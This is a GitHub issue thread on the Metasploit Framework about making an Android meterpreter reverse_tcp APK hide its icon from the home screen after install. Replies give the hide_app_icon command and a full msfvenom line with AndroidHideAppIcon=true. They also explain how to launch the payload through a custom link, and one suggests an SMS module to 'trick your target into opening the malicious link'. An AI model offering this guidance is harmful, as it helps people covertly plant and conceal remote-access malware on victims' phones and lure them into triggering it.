search

rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/
Other
34.19k stars 13.98k forks source link

Apps(msfvenm) not hiding after installing/first activity #8605

Closed netship01 closed 6 years ago

netship01 commented 7 years ago

Steps to reproduce

How'd you do it?

1.Use msfvenom to generate payload(Main activity)(android/meterpreter/reverse_tcp) 2.install this apk to android(6.0.1)

Expected behaviour

Apps should be hide from home screen after first launch

Current behaviour

It stays there on home screen. BTW i know there is way to hide app icon from meterpreter but i want to hide as soon as first activity is launched.

Refernence- I serach and found this https://github.com/rapid7/metasploit-payloads/pull/129 So its not bug please make it configurable.

Metasploit version

latest version

I installed Metasploit with:

OS

What OS are you running Metasploit on? parrot os

One other question- any way to wake Main Activity by sms/link.

h00die commented 7 years ago

Please clean up this issue, there is so much in here that you didn't remove I can't tell what the actual issue is. Please give output/screenshots from commands. My guess is you are running parrot OS with a git pull of the latest code. You attempted to make an APK package (not specifying if you bound into one for a trojan, or just a new one) with an unknown payload, and unknown options set. Once you infected an unknown android OS and unknown hardware it made an icon in the apps list. Dont answer if this is correct, clean up the issue so someone can try to track down if its a real bug or not.

netship01 commented 7 years ago

Thanks for replying. Please check this out and if possible in future please make this configurable. https://github.com/rapid7/metasploit-payloads/pull/129 https://github.com/rapid7/metasploit-payloads/commit/8c752b46f0832c690ef0b628d3e710473ce992a7

and any way to wake Main Activity by sms/link/. just like we launch playstore from link. This is in the androidManifest file <data android:host="my_host" android:scheme="metasploit"/>

timwr commented 7 years ago

The app icon is no longer hidden automatically, you can hide it with meterpreter > hide_app_icon You can launch by link but I'm not sure what the point is. The session should be persistent unless you kill it with meterpreter > exit

netship01 commented 7 years ago

You can launch by link but I'm not sure what the point is what is the link i try this intent://my_host#Intent;scheme=metasploit

ssss

For best results, you can consider using the auxiliary/client/sms/send_text to trick your target into opening the malicious link, and wake up Meterpreter.

netship01 commented 7 years ago

BTW please make it configurable(something in msfvenom during payload creation) not mandatory. Like -auto-hide switch. Please.. This feature was awesome.

@timwr

timwr commented 7 years ago

@netship01 I will make it configurable for you. I hope that will solve all your problems :)

netship01 commented 7 years ago

Oh Man! Thanks!!!!!

Unkown60 commented 4 years ago

The app icon is no longer hidden automatically, you can hide it with meterpreter > hide_app_icon You can launch by link but I'm not sure what the point is. The session should be persistent unless you kill it with meterpreter > exit

The command is not working I have Android 10 and when I installed the payload and typed hide_app_icon it says app icon is hidden but it never happens :-( tried with some other devices with Android 10 too still no response

ChillVibesMushroom commented 2 years ago

The app icon is no longer hidden automatically, you can hide it with meterpreter > hide_app_icon You can launch by link but I'm not sure what the point is. The session should be persistent unless you kill it with meterpreter > exit

The command is not working I have Android 10 and when I installed the payload and typed hide_app_icon it says app icon is hidden but it never happens :-( tried with some other devices with Android 10 too still no response

They did a security update that requires us to enable permission monitoring but some really good hackers don't have to do that and I'm not one of them 😂

KeiIsSuck commented 6 months ago

Steps to reproduce

How'd you do it?

1.Use msfvenom to generate payload(Main activity)(android/meterpreter/reverse_tcp) 2.install this apk to android(6.0.1)

Expected behaviour

Apps should be hide from home screen after first launch

Current behaviour

It stays there on home screen. BTW i know there is way to hide app icon from meterpreter but i want to hide as soon as first activity is launched.

Refernence- I serach and found this rapid7/metasploit-payloads#129 So its not bug please make it configurable.

Metasploit version

latest version

I installed Metasploit with:

  • [x] Kali package via apt

OS

What OS are you running Metasploit on? parrot os

One other question- any way to wake Main Activity by sms/link.

msfvenom -p android/meterpreter/reverse_tcp AndroidHideAppIcon=true LHOST ip LPORT port -o yourapkname.apk

after 7 years and maybe my answer is not useful now XD